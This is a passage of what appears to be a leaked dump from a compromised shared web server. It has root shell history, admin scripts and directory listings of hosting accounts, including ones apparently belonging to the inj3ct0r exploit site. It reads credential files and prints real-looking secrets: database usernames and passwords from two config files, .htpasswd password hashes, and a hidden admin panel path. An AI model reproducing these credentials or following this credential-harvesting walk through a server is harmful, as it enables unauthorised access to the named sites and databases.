  1602. apt-get upgrade
  1603. apt-get clean
  1604. exit
  1605. deluser sbs
  1606. cd /home
  1607. rm sbs -R
  1608. a2dissite sbs-ua.com
  1609. cd /etc/apache2
  1610. cd si*e
  1611. rm sbs-ua.com
  1612. apache2 -k restart
  1613. ls -al
  1614. exit
  1615. cd /home
  1616. ls -la
  1617. exit
  1618. cd /etc/apache2
  1619. cd si*e
  1620. cp chupik.org.ua vdnh.org.ua
  1621. cp chupik.org.ua vdnh.org.ua
  1622. ls -al
  1623. cd  ..
  1624. nano vhosts
  1625. cd si*e
  1626. ls -al
  1627. nano chupik.org.ua
  1628. nano vdnh.org.ua
  1629. a2ensite chupik.org.ua
  1630. a2ensite vdnh.org.ua
  1631. apache2 -k restart
  1632. exit
  1633.  
  1634. cd scripts
  1635. ls -la
  1636. total 4
  1637. drwxr-xr-x 2 root root 1024 Aug  2 21:39 .
  1638. drwxr-x--- 7 root root 1024 Oct 15 17:27 ..
  1639. -rwx------ 1 root root   76 Feb  1  2010 clear_cband.sh
  1640. -rwx------ 1 root root  220 May 31 00:59 uaix_block.sh
  1641. cat *
  1642. #!/bin/sh
  1643.  
  1644. apache2 -k stop
  1645. sleep 5
  1646. rm /etc/apache2/cband/*
  1647. apache2 -k start
  1648. #!/bin/sh
  1649.  
  1650. rm prefixes.txt
  1651. rm /etc/apache2/cband-ua.conf
  1652. wget -q http://www.colocall.net/uaix/prefixes.txt
  1653.  
  1654. for i in `cat prefixes.txt`
  1655. do
  1656.  echo "CBandClassDst $i" >> /etc/apache2/cband-ua.conf
  1657. done
  1658.  
  1659. apache2ctl graceful
  1660.  
  1661. $ cd ..
  1662.  
  1663. $ cd test
  1664.  
  1665. $ ls -la
  1666. total 2
  1667. drwxr-xr-x 2 root root 1024 Oct 15 16:51 .
  1668. drwxr-x--- 7 root root 1024 Oct 15 17:27 ..
  1669. -rw-r--r-- 1 root root    0 Oct 15 16:34 1d7.JPg
  1670. -rw-r--r-- 1 root root    0 Oct 15 16:33 1d_5.jpg
  1671. -rw-r--r-- 1 root root    0 Oct 15 16:33 1d_7.JPG
  1672. -rw-r--r-- 1 root root    0 Oct 15 16:33 ONE.JPG
  1673.  
  1674. $ cd /home
  1675.  
  1676. $ ls -la
  1677. total 169
  1678. drwxr-x--x 37 root                        root                  4096 Oct 20 17:45 .
  1679. drwxr-xr-x 22 root                        root                  1024 Oct  3 22:04 ..
  1680. -rw-------  1 root                        root                  9216 Oct 22 17:45 aquota.group
  1681. -rw-------  1 root                        root                  9216 Oct 22 17:45 aquota.user
  1682. drwxr-x---  7 asmer                       asmer                 4096 Oct 22 18:58 asmer
  1683. drwxr-x---  6 cherrybikes                 cherrybikes           4096 Oct 24 18:56 cherrybikes
  1684. drwxr-x---  4 chupik                      chupik                4096 Dec 14  2009 chupik
  1685. drwxr-x---  4 conference-sidelnikov       conference-sidelnikov 4096 Jan  7  2010 conference-sidelnikov
  1686. drwxr-x---  4 dyquem                      dyquem                4096 Sep  6 17:20 dyquem
  1687. drwxr-x---  4 hochumogu                   hochumogu             4096 Jul 16 16:51 hochumogu
  1688. drwxr-x--- 13 jaguar                      jaguar                4096 Oct 24 10:49 jaguar
  1689. drwxr-x---  4 krivopustov                 krivopustov           4096 Nov  6  2007 krivopustov
  1690. drwxr-x---  3 lalizas                     lalizas               4096 Feb 18  2009 lalizas
  1691. drwxr-x---  4 magicgarden                 magicgarden           4096 Jul 12 23:32 magicgarden
  1692. drwxr-x---  4 mazafaka                    inj3ct0r              4096 Oct  3 20:33 mazafaka
  1693. drwxr-x---  4 n3tw0rkTeRr0r15M            inj3ct0r              4096 Aug 12 12:15 n3tw0rkTeRr0r15M
  1694. drwxr-x---  4 natasha                     natasha               4096 Oct 19  2009 natasha
  1695. drwxr-x---  4 nmusic                      nmusic                4096 Mar  2  2009 nmusic
  1696. drwxr-x---  4 pma                         pma                   4096 May 13 16:28 pma
  1697. drwxrwx---  4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r              4096 Oct 20 22:56 r0otech0inj3ct0rr00t0ro0t3r
  1698. drwxr-x---  4 ra5ta                       ra5ta                 4096 Jul 12 18:25 ra5ta
  1699. drwxr-x---  4 silentwarrior               silentwarrior         4096 Oct  4  2009 silentwarrior
  1700. drwxr-x---  4 skyweb                      skyweb                4096 Apr 16  2010 skyweb
  1701. drwxr-x---  4 snt-nmu                     snt-nmu               4096 Feb 27  2009 snt-nmu
  1702. drwxr-x---  4 steelnews                   steelnews             4096 Sep  4 15:20 steelnews
  1703. drwxr-x---  4 sunsanych                   sunsanych             4096 Jun 13 14:07 sunsanych
  1704. drwxr-x---  4 sweethome                   sweethome             4096 Aug 16 01:21 sweethome
  1705. drwxrwxrwx  2 root                        root                  4096 Oct 24 16:12 temp
  1706. drwxr-x---  4 tiler                       tiler                 4096 Oct 20 22:37 tiler
  1707. drwxr-x---  4 tmv-nmu                     tmv-nmu               4096 May  6 08:49 tmv-nmu
  1708. drwxr-x---  4 vakulenko                   vakulenko             4096 Feb 27  2009 vakulenko
  1709. drwxr-x---  4 vika                        vika                  4096 Sep  8 19:15 vika
  1710. drwxr-x---  4 volosovets                  volosovets            4096 Nov  6  2007 volosovets
  1711. drwxr-x---  4 vonline                     vonline               4096 Sep  5 22:13 vonline
  1712. drwxr-x---  5 wapper                      wapper                4096 Jun 13  2009 wapper
  1713. drwxr-x---  4 wateam                      wateam                4096 Dec 27  2009 wateam
  1714. drwxr-x---  4 web-ghost                   web-ghost             4096 Jun  7 10:05 web-ghost
  1715. drwxr-x---  4 xanavi                      xanavi                4096 Jun  9  2009 xanavi
  1716. drwxr-x---  4 yslivka                     yslivka               4096 Apr 23  2010 yslivka
  1717.  
  1718. $ cd r0otech0inj3ct0rr00t0ro0t3r
  1719.  
  1720. $ ls -la
  1721. total 8048
  1722. drwxrwx---  4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    4096 Oct 20 22:56 .
  1723. drwxr-x--x 37 root                        root        4096 Oct 20 17:45 ..
  1724. drwxr-xr-x  2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    4096 Jan 22  2010 cgi-bin
  1725. -rw-r--r--  1 n3tw0rkTeRr0r15M            inj3ct0r 8210510 Oct 24 19:29 error.log
  1726. dr-xr-xr-x  9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    4096 Oct 24 19:27 htdocs
  1727.  
  1728. $ cd htdocs
  1729.  
  1730. $ ls -la
  1731. total 184
  1732. dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Oct  5 19:21 .
  1733. drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Oct 20 22:56 ..
  1734. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1821 Oct  5 19:19 .htaccess
  1735. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    85 Oct  1 14:17 BingSiteAuth.xml
  1736. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4047 Oct  1 14:17 author.php
  1737. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 18 12:56 banner
  1738. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 19 13:20 banner_black
  1739. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1445 Oct  1 14:17 browser.php
  1740. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2308 Oct  1 14:17 category.php
  1741. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r   604 Oct  1 14:17 config.php
  1742. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1598 Oct  1 14:17 date.php
  1743. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r   562 Oct  1 14:17 db.php
  1744. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2090 Oct  1 14:17 exploit.php
  1745. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1406 Oct  1 14:17 favicon.ico
  1746. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 28 14:15 files
  1747. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    53 Oct  1 14:17 googlee6e0c515ab2abd97.html
  1748. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    83 Oct  1 14:17 hacker.php
  1749. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 19 02:37 images
  1750. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1745 Oct 16 12:34 index.php
  1751. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2672 Oct  8 13:19 inj3ct0r.css
  1752. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  9293 Oct  5 19:15 lib.php
  1753. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 18 12:56 pages
  1754. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1008 Oct  1 14:17 pages.php
  1755. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2873 Oct  1 14:17 platform.php
  1756. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1894 Oct  1 14:17 related.php
  1757. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r   131 Oct  1 14:17 robots.txt
  1758. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1598 Oct  1 14:17 rss.php
  1759. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2203 Oct  5 19:10 search.php
  1760. -rwxr--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1739 Oct  1 14:17 sitemap.php
  1761. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 48792 Oct 24 18:58 sitemap.xml.gz
  1762. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 27 23:53 sploits
  1763. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 18 12:56 templates
  1764. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r   261 Oct  1 14:17 y_key_6e34fe98df61c405.html
  1765. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r     0 Oct  1 14:17 yandex_76b91b15d528ba00.txt
  1766.  
  1767. $ cat config.php
  1768. <?
  1769.  
  1770. $GLOBAL_START = microtime(true);
  1771.  
  1772. define("DB_HOST", "localhost");
  1773. define("DB_LOGIN", "9r0o7yIn6vD2k9a4");
  1774. define("DB_PASSWORD", "=!(_r0ot+e-c-h-0@inj3ct0r_)!=");
  1775. define("DB_DATABASE", "9r0o7yIn6vD2k9a4");
  1776. define("DB_PREFIX", "inj3ct0r_v2_");
  1777.  
  1778. define("BAN_COUNT", 4);
  1779.  
  1780. define("EXPLOITS_ON_MAIN", 8);
  1781. define("EXPLOITS_ON_PAGE", 30);
  1782. define("LINKS_PER_PAGE", 11);
  1783.  
  1784. $shellcodeCategories = array(1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 21, 22, 23, 24, 27, 28, 29, 30, 32, 33);
  1785.  
  1786. $mainCategories = array(
  1787. 34,
  1788. 26,
  1789. 20,
  1790. 6,
  1791. 7,
  1792. "shellcode" => $shellcodeCategories,
  1793. 25
  1794. );
  1795.  
  1796. $redCategory = 34;
  1797.  
  1798. ?>
  1799.  
  1800. $ cd ..
  1801. $ cd n3tw0rkTeRr0r15M
  1802.  
  1803. $ ls -la
  1804. total 20
  1805. drwxr-x---  4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 .
  1806. drwxr-x--x 37 root             root     4096 Oct 20 17:45 ..
  1807. -rw-r--r--  1 n3tw0rkTeRr0r15M inj3ct0r   96 Aug 12 12:15 .htpasswd
  1808. drwxr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jan 22  2010 cgi-bin
  1809. drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct  4 00:16 htdocs
  1810.  
  1811. $ cat .htpasswd
  1812. inj3ct0r:1dAX/67F424a4D3Z.QWXTfZi0e2/0G/
  1813. inj3ct0r_operator:1cjVbCTaHGGgdG7e.ceNBXZ7ucjsOt1
  1814.  
  1815. $ cd htdocs
  1816.  
  1817. $ ls -la
  1818. total 2240
  1819. drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r   4096 Oct  4 00:16 .
  1820. drwxr-x---  4 n3tw0rkTeRr0r15M inj3ct0r   4096 Aug 12 12:15 ..
  1821. -rw-r--r--  1 n3tw0rkTeRr0r15M inj3ct0r    178 Aug 24 01:59 .htaccess
  1822. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  24170 Jun 29 15:27 ajax.php
  1823. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  75837 Jun 29 15:27 album.php
  1824. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  17463 Jun 29 15:27 announcement.php
  1825. dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 archive
  1826. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  18637 Jun 29 15:28 attachment.php
  1827. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  75654 Jun 29 15:28 calendar.php
  1828. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r     43 Jun  6 14:02 clear.gif
  1829. dr-xr-xr-x  4 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 27 19:45 clientscript
  1830. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  15264 Jun 29 15:28 converse.php
  1831. dr-xr-xr-x  7 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:01 cpstyles
  1832. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   3645 Jun 29 15:28 cron.php
  1833. dr-xr-xr-x  3 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 customavatars
  1834. dr-xr-xr-x  3 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:01 customgroupicons
  1835. dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:01 customprofilepics
  1836. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  48083 Jun 29 15:28 editpost.php
  1837. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  29811 Jun 29 15:29 external.php
  1838. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10114 Jun 29 15:29 faq.php
  1839. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  36347 Jun 29 15:41 forumdisplay.php
  1840. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  40159 Jun 29 15:29 global.php
  1841. dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:01 greenfox
  1842. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 138517 Jun 29 15:30 group.php
  1843. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  25247 Jun 29 15:29 group_inlinemod.php
  1844. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10850 Jun 29 15:30 groupsubscription.php
  1845. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   9375 Jun 29 15:30 image.php
  1846. dr-xr-xr-x  5 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 27 19:42 images
  1847. dr-xr-xr-x  6 n3tw0rkTeRr0r15M inj3ct0r  12288 Jun  6 14:01 includes
  1848. -rwxrwxrwx  1 n3tw0rkTeRr0r15M inj3ct0r  19444 Sep 26 12:27 index.php
  1849. dr-xr-xr-x  6 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 22 16:28 infernoshout
  1850. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  11103 Jun 29 15:30 infernoshout.php
  1851. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  44256 Jun 29 15:30 infraction.php
  1852. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 183249 Jun 29 15:31 inlinemod.php
  1853. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10670 Jun 29 15:31 joinrequests.php
  1854. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  11052 Jun 29 15:31 login.php
  1855. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  17392 Jun 29 15:31 member.php
  1856. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  16259 Jun 29 15:31 member_inlinemod.php
  1857. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  36229 Jun 29 15:31 memberlist.php
  1858. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  24194 Jun 29 15:31 misc.php
  1859. dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 modcp
  1860. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  63652 Jun 29 15:32 moderation.php
  1861. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   7084 Jun 29 15:32 moderator.php
  1862. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   1889 Jun 29 15:32 myip.php
  1863. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  18804 Jun 29 15:32 newattachment.php
  1864. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  37429 Jun 29 15:33 newreply.php
  1865. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  19239 Jun 29 15:33 newthread.php
  1866. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  19932 Jun 29 15:33 online.php
  1867. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   8024 Jun 29 15:33 payment_gateway.php
  1868. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  12238 Jun 29 15:33 payments.php
  1869. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   8217 Jun 29 15:34 picture.php
  1870. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  22368 Jun 29 15:33 picture_inlinemod.php
  1871. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  25635 Jun 29 15:34 picturecomment.php
  1872. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  27740 Jun 29 15:34 poll.php
  1873. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   9840 Jun 29 15:34 posthistory.php
  1874. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  74696 Jun 29 15:34 postings.php
  1875. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   6921 Jun 29 15:34 printthread.php
  1876. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  71068 Jun 29 15:34 private.php
  1877. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 152656 Jun 29 15:35 profile.php
  1878. dr-xr-xr-x  3 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 22 22:02 r00tpan3l123lol
  1879. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  40079 Jun 29 15:35 register.php
  1880. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   6015 Jun 29 15:35 report.php
  1881. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  14047 Jun 29 15:35 reputation.php
  1882. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 125045 Jun 29 15:35 search.php
  1883. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  21274 Jun 29 15:35 sendmessage.php
  1884. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10337 Jun 29 15:36 showgroups.php
  1885. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  12716 Jun 29 15:36 showpost.php
  1886. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  73853 Jun 29 15:36 showthread.php
  1887. dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 signaturepics
  1888. dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 22 15:42 smilies
  1889. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  17014 Jun 29 15:36 spy.php
  1890. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  33204 Jun 29 15:36 subscription.php
  1891. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  13693 Jun 29 15:36 tags.php
  1892. dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jul 22 12:03 tech_blue
  1893. dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jul 19 22:04 tech_dark
  1894. dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jul 19 22:04 tech_white
  1895. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   9020 Jun 29 15:36 threadrate.php
  1896. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  12743 Jun 29 15:36 threadtag.php
  1897. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  34836 Jun 29 15:37 usercp.php
  1898. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  19423 Jun 29 15:37 usernote.php
  1899. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  29903 Jun 29 15:37 validator.php
  1900. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  27705 Jun 29 15:37 visitormessage.php
  1901.  
  1902. $ cat includes/config.php
  1903. <?php
  1904. /*======================================================================*\
  1905. || #################################################################### ||
  1906. || # vBulletin 3.8.5
  1907. || # ---------------------------------------------------------------- # ||
  1908. || # All PHP code in this file is ©2000-2010 Jelsoft Enterprises Ltd. # ||
  1909. || # This file may not be redistributed in whole or significant part. # ||
  1910. || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
  1911. || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
  1912. || #################################################################### ||
  1913. \*======================================================================*/
  1914.  
  1915. /*-------------------------------------------------------*\
  1916. | ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
  1917. +---------------------------------------------------------+
  1918. | If you get any errors while attempting to connect to    |
  1919. | MySQL, you will need to email your webhost because we   |
  1920. | cannot tell you the correct values for the variables    |
  1921. | in this file.                                           |
  1922. \*-------------------------------------------------------*/
  1923.  
  1924.    //   ****** DATABASE TYPE ******
  1925.    //   This is the type of the database server on which your vBulletin database will be located.
  1926.    //   Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
  1927.    // for slave options just append _slave to your preferred database type.
  1928. config['Database']['dbtype'] = 'mysql';
  1929.  
  1930.    //   ****** DATABASE NAME ******
  1931.    //   This is the name of the database where your vBulletin will be located.
  1932.    //   This must be created by your webhost.
  1933. config['Database']['dbname'] = 'n3tw0rkTeRr0r15M';
  1934.  
  1935.    //   ****** TABLE PREFIX ******
  1936.    //   Prefix that your vBulletin tables have in the database.
  1937. config['Database']['tableprefix'] = '';
  1938.  
  1939.    //   ****** TECHNICAL EMAIL ADDRESS ******
  1940.    //   If any database errors occur, they will be emailed to the address specified here.
  1941.    //   Leave this blank to not send any emails when there is a database error.
  1942. config['Database']['technicalemail'] = 'dbmaster@example.com';
  1943.  
  1944.    //   ****** FORCE EMPTY SQL MODE ******
  1945.    // New versions of MySQL (4.1+) have introduced some behaviors that are
  1946.    // incompatible with vBulletin. Setting this value to "true" disables those
  1947.    // behaviors. You only need to modify this value if vBulletin recommends it.
  1948. config['Database']['force_sql_mode'] = false;
  1949.  
  1950.  
  1951.  
  1952.    //   ****** MASTER DATABASE SERVER NAME AND PORT ******
  1953.    //   This is the hostname or IP address and port of the database server.
  1954.    //   If you are unsure of what to put here, leave the default values.
  1955. config['MasterServer']['servername'] = 'localhost';
  1956. config['MasterServer']['port'] = 3306;
  1957.  
  1958.    //   ****** MASTER DATABASE USERNAME & PASSWORD ******
  1959.    //   This is the username and password you use to access MySQL.
  1960.    //   These must be obtained through your webhost.
  1961. config['MasterServer']['username'] = 'n3tw0rkTeRr0r15M';
  1962. config['MasterServer']['password'] = '+)(_3xpl0!t3R_goG)teror15M(_}';
  1963.  
  1964.    //   ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
  1965.    //   This option allows you to turn persistent connections to MySQL on or off.
  1966.    //   The difference in performance is negligible for all but the largest boards.
  1967.    //   If you are unsure what this should be, leave it off. (0 = off; 1 = on)
  1968. config['MasterServer']['usepconnect'] = 0;
  1969.  
  1970.  
  1971.  
  1972.    //   ****** SLAVE DATABASE CONFIGURATION ******
  1973.    //   If you have multiple database backends, this is the information for your slave
  1974.    //   server. If you are not 100% sure you need to fill in this information,
  1975.    //   do not change any of the values here.
  1976. config['SlaveServer']['servername'] = '';
  1977. config['SlaveServer']['port'] = 3306;
  1978. config['SlaveServer']['username'] = '';
  1979. config['SlaveServer']['password'] = '';
  1980. config['SlaveServer']['usepconnect'] = 0;
  1981.  
  1982.  
  1983.  
  1984.    //   ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
  1985.    //   This setting allows you to change the name of the folders that the admin and
  1986.    //   moderator control panels reside in. You may wish to do this for security purposes.
  1987.    //   Please note that if you change the name of the directory here, you will still need
  1988.    //   to manually change the name of the directory on the server.
  1989. config['Misc']['admincpdir'] = 'r00tpan3l123lol';
  1990. config['Misc']['modcpdir'] = 'modcp';
  1991.  
  1992.    //   Prefix that all vBulletin cookies will have
  1993.    //   Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
  1994. config['Misc']['cookieprefix'] = 'bb';
  1995.  
  1996.    //   ******** FULL PATH TO FORUMS DIRECTORY ******
  1997.    //   On a few systems it may be necessary to input the full path to your forums directory
  1998.    //   for vBulletin to function normally. You can ignore this setting unless vBulletin
  1999.    //   tells you to fill this in. Do not include a trailing slash!
  2000.    //   Example Unix:
  2001.    //     config['Misc']['forumpath'] = '/home/users/public_html/forums';
  2002.    //   Example Win32:
  2003.    //     config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
  2004. config['Misc']['forumpath'] = '';
  2005.  
  2006.    //   ****** COOKIE SECURITY HASH ******
  2007.    //   This option allows you to encode cookie.
  2008.    //   You may use any latin and/or any other alphanumeric symbols.
  2009.    //   Leave this blank to use the default value.
  2010.    //   Note: if you change this all users will be logout.
  2011. config['Misc']['cookie_security_hash'] = '';
  2012.  
  2013.  
  2014.  
  2015.    //   ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
  2016.    //   The users specified here will be allowed to view the admin log in the control panel.
  2017.    //   Users must be specified by *ID number* here. To obtain a user's ID number,
  2018.    //   view their profile via the control panel. If this is a new installation, leave
  2019.    //   the first user created will have a user ID of 1. Seperate each userid with a comma.
  2020. config['SpecialUsers']['canviewadminlog'] = '1,237';
  2021.  
  2022.    //   ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
  2023.    //   The users specified here will be allowed to remove ("prune") entries from the admin
  2024.    //   log. See the above entry for more information on the format.
  2025. config['SpecialUsers']['canpruneadminlog'] = '1';
  2026.  
  2027.    //   ****** USERS WITH QUERY RUNNING PERMISSIONS ******
  2028.    //   The users specified here will be allowed to run queries from the control panel.
  2029.    //   See the above entries for more information on the format.
  2030.    //   Please note that the ability to run queries is quite powerful. You may wish
  2031.    //   to remove all user IDs from this list for security reasons.
  2032. config['SpecialUsers']['canrunqueries'] = '';
  2033.  
  2034.    //   ****** UNDELETABLE / UNALTERABLE USERS ******
  2035.    //   The users specified here will not be deletable or alterable from the control panel by any users.
  2036.    //   To specify more than one user, separate userids with commas.
  2037. config['SpecialUsers']['undeletableusers'] = '1';
  2038.  
  2039.    //   ****** SUPER ADMINISTRATORS ******
  2040.    //   The users specified below will have permission to access the administrator permissions
  2041.    //   page, which controls the permissions of other administrators
  2042. config['SpecialUsers']['superadministrators'] = '1';
  2043.  
  2044.    // ****** DATASTORE CACHE CONFIGURATION *****
  2045.    // Here you can configure different methods for caching datastore items.
  2046.    // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
  2047.    // vB_Datastore_APC - to use APC
  2048.    // vB_Datastore_XCache - to use XCache
  2049.    // vB_Datastore_Memcached - to use a Memcache server, more configuration below
  2050. // config['Datastore']['class'] = 'vB_Datastore_Filecache';
  2051.  
  2052.    // ******** DATASTORE PREFIX ******
  2053.    // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
  2054.    // than one set of forums installed on your host, you *may* need to use a prefix
  2055.    // so that they do not try to use the same variable within the cache.
  2056.    // This works in a similar manner to the database table prefix.
  2057. // config['Datastore']['prefix'] = '';
  2058.  
  2059.    // It is also necessary to specify the hostname or IP address and the port the server is listening on
  2060. /*
